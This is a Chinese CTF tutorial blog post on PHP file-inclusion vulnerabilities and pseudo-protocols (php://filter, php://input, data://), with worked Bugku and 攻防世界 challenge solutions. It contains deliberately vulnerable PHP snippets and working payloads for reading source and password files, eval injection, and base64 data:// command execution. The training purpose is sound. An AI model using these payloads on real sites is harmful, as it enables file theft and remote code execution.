CTF-WEB:PHP 伪协议

文件包含漏洞

为了更好地使用代码的重用性,可以使用文件包含函数将文件包含进来,直接使用文件中的代码来提高重用性。但是这也产生了文件包含漏洞,产生原因是在通过 PHP 的函数引入文件时,为了灵活包含文件会将被包含文件设置为变量,通过动态变量来引入需要包含的文件。此时用户可以对变量的值可控,而服务器端未对变量值进行合理地校验或者校验被绕过,就会导致文件包含漏洞。

文件包含函数

函数 功能
include() 代码执行到 include() 函数时将文件包含
include_once() 当重复调用同一文件时只调用一次,功能与 include() 相同
require() require() 执行如果发生错误,函数会报错并终止脚本
require_once() 当重复调用同一文件时只调用一次,功能与 require() 相同

包含漏洞分类

本地包含

当包含的文件在服务器本地时,就形成了本地文件包含。文件包含可以包含任意文件,被包含的文件可以不是 PHP 代码,可以是文本或图片等。只要文件被包含就会被服务器脚本语言执行,如果包含的文件内容不符合 php 语法,会直接将文件内容输出。例如下面这段简易的代码:

<?php
    $file = $_GET['file'];
    include($file);
?>

远程包含

当包含的文件在远程服务器上时,就形成了远程文件包含。所包含远程服务器的文件后缀不能与目标服务器语言相同,远程文件包含需要在 php.ini 中设置:

allow_url_include = on(是否允许 include/require 远程文件)
allow_url_fopen = on(是否允许打开远程文件)

伪协议

PHP 伪协议

PHP 伪协议是 PHP 支持的协议与封装协议,几个 PHP 支持的伪协议如下。

伪协议 功能
file:// 访问本地文件系统
http:// 访问 HTTP(s) 网址
php:// 访问各个输入/输出流
phar:// PHP 归档
zip:// 压缩流

例如在 allow_url_include = on 时服务器上有个文件叫 index.php,且存在文件包含漏洞,这个时候就能用 php 伪协议直接把文件显示出来。

?file=php://filter/read=convert.base64-encode/resource=index.php

稍微解释下这个做法,php://filter/ 是一种访问本地文件的协议,/read=convert.base64-encode/ 表示读取的方式是 base64 编码后,resource=index.php 表示目标文件为index.php。问什么要进行 base64 编码呢?如果不进行 base64 编码传入,index.php 就会直接执行,我们就看不到文件中的内容了。
php 协议还常用 php://input,这可以访问请求的原始数据的只读流,可以读取 POST 请求的参数。

使用样例

假设一个测试页面该页面存在文件包含漏洞,且网站内部有密码的备份文件,尝试获取密码。在 index.php 页面下有个 file 参数用于接收要包含的文件,设置之为 php://input 伪协议,用 post 传递要执行的 php 代码。系统执行 ls 命令遍历目录,看到当前目录下有 2 个 php 文件。

显然密码文件不在这里,执行 pwd 命令查看当前的目录,看到这里距离站点根目录还有好几层。

使用“ls ..”遍历上一级目录,看到一张图片和 2 个网站的目录。

使用“ls ../..”遍历上一级的上一级目录,看到文件“mima”,此地无银三百两。

使用 php://filter 伪协议查看该文件,base64 解码后得到想要的东西。

?file=php://filter/read=convert.base64-encode/resource=../../mima


data 伪协议

php 5.2.0 起,数据流封装器开始有效,主要用于数据流的读取,如果传入的数据是PHP代码就会执行代码。使用方法为:

data://text/plain;base64,xxxx(base64编码后的数据)

例题:bugku-本地包含

题目的源码如下,观察到代码将提取一个 REQUEST 变量,这个变量时 HTTP Request 变量,默认情况下包含了 GET、POST 和 COOKIE 的数组。

<?php
    include "flag.php";
    $a = @$_REQUEST['hello'];
    eval("var_dump($a);");      //var_dump() 函数可以输出变量的类型和值
    show_source(__FILE__);
?>

第一种解法是利用 eval() 函数,它把字符串按照 PHP 代码来计算,该字符串必须是合法的 PHP 代码且必须以分号结尾。这里 eval() 会把变量 a 中的内容提取出来,然后执行 var_dump() 函数输出。不过由于变量 a 来自于变量 hello 变量,而如果 hello 变量中的内容是代码,也会被执行。所以这里可以传入一句代码来直接显示 flag.php,例如:

hello=);show_source(%27flag.php%27

则在 eval 中,就会把上述 hello 的值替换掉变量 a,等同于执行如下代码:

var_dump();
show_source('flag.php');

同理,使用其他的函数显示文件也是可以的,注意使用 “);” 来构造。

hello=);print_r(file("flag.php")
hello=);var_dump(file("flag.php")
hello=);include(@$_POST['b']

第二种解法就是用 PHP 伪协议把 flag.php 文件读出来,然后再使用 include() 函数包含出来。

当然还有第 3 种解法,就是直接把 flag.php 导入到 hello 变量中。

例题:bugku-flag 在 index 里

打开网页,点击后观察 url 有个文件包含漏洞,也就是说我们可以想办法把包含 flag 的文件导出来。

根据提示 flag 在 index.php 里,使用 php 伪协议把文件内容的 base64 编码导出,解码得到 flag。

例题:bugku-welcome to bugkuctf

打开网页查看源码如下,源码要求用 GET 方式传递三个参数,其中 user 不为空,并且作为文件名变量打开后的文件内容为 “welcome to the bugkuctf”,file 要求值为 hint.php。

<!--  
$user = $_GET["txt"];  
$file = $_GET["file"];  
$pass = $_GET["password"];  
  
if(isset($user)&&(file_get_contents($user,'r')==="welcome to the bugkuctf")){  
    echo "hello admin!<br>";  
    include($file); //hint.php  
}
else{  
    echo "you are not admin ! ";  
}  
 -->  

对于变量 user,当传进去的变量的参数作为文件名变量去打开时,可用 php://input 作为参数,同时使用 post 方式传入内容作为变量的文件内容。对于 file 变量,可以使用伪协议 php://filter 来读取 hint.php 文件。构造出的 payload 为:

index.php?txt=php://input&file=php://filter/read=convert.base64-encode/resource=hint.php&password=


此时就得到了 hint.php 的源码的 base64 编码,解码后得到:

<?php

class Flag{//flag.php
    public $file;
    public function __tostring(){
        if(isset($this->file)){
            echo file_get_contents($this->file);
            echo "<br>";
        return ("good");
        }
    }
}
?>

接下来的内容关于 PHP 反序列化,可以前往博客CTF-WEB:PHP 反序列化查看剩余步骤。

例题:攻防世界-Web_php_include

打开网页,看到一段 PHP 代码如下,观察到这段代码有 include() 函数,因此这题要考虑文件包含漏洞。strstr() 函数查找字符串首次出现的位置,然后返回字符串剩余部分。注意到这段代码使用了 strstr() 函数将传入参数中的 “php://” 全部删了,也就是说此处无法直接使用 PHP 伪协议来完成。

<?php
show_source(__FILE__);
echo $_GET['hello'];
$page=$_GET['page'];
while (strstr($page, "php://")) {
    $page=str_replace("php://", "", $page);
}
include($page);
?>

注意到这里还传递了一个参数 “hello”,我们尝试传一个参数进去,发现这个参数被回显回了网页。因此我们考虑以命令执行,然后命令执行的结果回显到浏览器,例如用 ls、cat 命令来查看。

这里可以改用 data 伪协议来做,首先我们还是要先知道 flag 放在哪里,写出如下代码,则网页就会执行 ls 命令输出目录下的文件名。

<?php system("ls")?>

根据 data 伪协议的使用方法,我们需要把上述代码用 base64 编码然后传入:

?page=data://text/plain/;base64,PD9waHAgc3lzdGVtKCJscyIpPz4=


接下来就要查看 “fl4gisisish3r3.php” 这个文件的内容了,还是一样写出下面代码让网页执行 cat 命令查看文件。

<?php system("cat")?>

还是一样把上述代码用 base64 编码然后传入,然后打开 F12 查看源码就能看到 flag。

?page=data://text/plain/;base64,PD9waHAgc3lzdGVtKCJjYXQiKT8+

参考资料

文件包含漏洞学习总结
Web安全实战系列:文件包含漏洞
PHP伪协议总结

posted @ 2020-08-21 00:40  乌漆WhiteMoon  阅读(8608)  评论(6编辑  收藏  举报